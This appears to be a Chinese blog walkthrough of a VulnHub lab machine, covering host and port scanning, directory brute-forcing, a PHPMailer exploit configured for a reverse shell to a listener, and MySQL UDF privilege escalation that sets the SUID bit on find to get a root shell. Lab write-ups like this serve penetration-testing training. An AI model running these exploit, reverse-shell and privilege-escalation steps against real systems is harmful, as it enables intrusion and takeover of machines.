vulnhub靶机rava2渗透测试

首先利用netdiscover这个工具来进行对靶机的IP扫描:

netdiscover 

在这里插入图片描述
然后可以判断出靶机IP为192.168.34.225,接着就用nmap扫描一下靶机的端口开放情况:

nmap -A 192.168.34.225

在这里插入图片描述
发现靶机开放了22,80,111这3个端口,然后就先访问一下80端口:
在这里插入图片描述
接着就是用dirb工具扫描目录,进行目录的爆破:

dirb http://192.168.34.225

在这里插入图片描述
在扫描出来的目录中,经过挨个的点开查看后发现vendor这个目录的PATH这文件中有这我们要找的第一个flag:
在这里插入图片描述
不过它还把网站的目录地址也爆出来了,然后把每个文件都点开看一下:
在这里插入图片描述
在README.md这个文件中发现靶机服务器安装了PHPMailer:
在这里插入图片描述
在VERSION这个文件中找到了这个php服务器的版本号:
在这里插入图片描述
然后使用searchsploit工具查看一下php的版本漏洞:

searchsploit PHPMailer

在这里插入图片描述
在这里我们选用:
在这里插入图片描述
来进行攻击,我们先把这个文件给复制出来:

cp /usr/share/exploitdb/exploits/php/webapps/40974.py ./

然后我们把这个文件进行编辑:

vim 40974.py

开头要加:

#!/usr/bin/python
# -*- coding: utf-8 -*-

以防出现乱码或者错误:
在这里插入图片描述
然后修改配置文件,修改的地方有:

crget = ‘靶机ip’
backdoor = ‘生成php文件名’
(\‘kali的ip’\, 端口)
/tmp -X/所生成的php文件的路径 server\

修改完以后是这样的:
在这里插入图片描述
然后运行这个文件:

python 40974.py

在这里插入图片描述
然后再监听这个网页从而反弹shell:

nc -lvp 7777

在这里插入图片描述
成功连接靶机后开始寻找flag:

find / -name flag*

在这里插入图片描述
然后就可以看到所有的flag,从而可以得到flag2和flag3:
在这里插入图片描述
Flag3是个图片,所以直接网页打开这个就好:
在这里插入图片描述
完了以后,我们先用python来获取个pty:

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
至于flag4,因为它在root下,所以要进行提权才可以得到,
我们上传个LinEnum.sh对LINUX进行信息搜集,方便提权使用,项目地址为:
https://github.com/rebootuser/LinEnum
这里就要使用到搭建简易服务器进行下载了,下载好以后加权运行:

chmod +x LinEnum.sh
./LinEnum.sh

在这里插入图片描述
在这里插入图片描述
看到这个我们可以知道靶机使用给mysql的版本号,如果MySQL版本<=5.7.14,5.6.32,5.5.51的话,可以利用MySQL-Exploit-Remote-Root-Code-Execution-Privesc漏洞进行提权。
我们从https://www.exploit-db.com/exploits/1518获取EXP,先在kali中生成so文件:

wget https://www.exploit-db.com/download/1518
mv 1518 1.c
gcc -g -c 1.c
gcc -g -shared -o  1.so 1.o -lc
mv 1.so 2.so

在这里插入图片描述
然后同样在靶机上用wget下载2.so
在这里插入图片描述
我们先回到网站的根目录用ls命令查看一下,可以看到有wordpress(wp):
在这里插入图片描述
进去看一下wp的配置文件:
在这里插入图片描述
查看一下wp-config.php:
在这里插入图片描述
在这里面可以找到myslq的账号和密码:
在这里插入图片描述
数据库账号:root
数据库密码:R@v3nSecurity
然后进行数据库提权:

use msyql  

在这里插入图片描述

create table foo(line blob);  

(创建一个名为foo的blob数据类型(二进制对象)的数据表)
Insert into foo values(load_file(‘/tmp/sdfz_udf.so’));
(把’/tmp/sdfz_udf.so’文件插入到foo这个数据表中)

Select * from foo into dumpfile ‘usr/lib/mysql/plugin/sdfz_udf.so’;

(把foo里面的数据导出到‘usr/lib/mysql/plugin/sdfz_udf.so’下)
在这里插入图片描述

Create function do_system returns integer soname ‘sdfz_udf.so’;

(创建一个do_system函数,并返回整数类型的数据)
在这里插入图片描述

Select * from myslq.func

(查看mysql数据库中func表里的所有数据)
在这里插入图片描述

Select do_system(‘chmod u+s /usr/bin/find’);

(调用这个函数给用户的find命令增加s权限)
查看一下当前的权限:
在这里插入图片描述
然后用find命令进行提权:

find / -exec “/bin/sh”  \;

(用find / -exec 命令去执行 “/bin/sh”)
在这里插入图片描述最后得到flag.4

参考:https://blog.csdn.net/nzjdsds/article/details/93971746

  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值